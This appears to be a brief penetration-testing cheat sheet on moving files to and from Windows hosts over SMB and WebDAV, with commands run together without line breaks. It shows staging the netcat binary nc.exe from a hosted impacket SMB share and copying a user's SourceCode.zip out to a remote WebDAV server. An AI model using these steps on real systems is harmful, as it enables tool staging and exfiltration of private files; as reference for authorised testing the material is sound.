SMB Download/Upload
Download
sudo impacket-smbserver share -smb2support /tmp/smbsharesudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password testcopy \\192.168.220.133\share\nc.exenet use n: \\192.168.220.133\share /user:test test
copy n:\nc.exeUpload
sudo pip3 install wsgidav cherootsudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymousdir \\192.168.49.128\DavWWWRootcopy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot\Last updated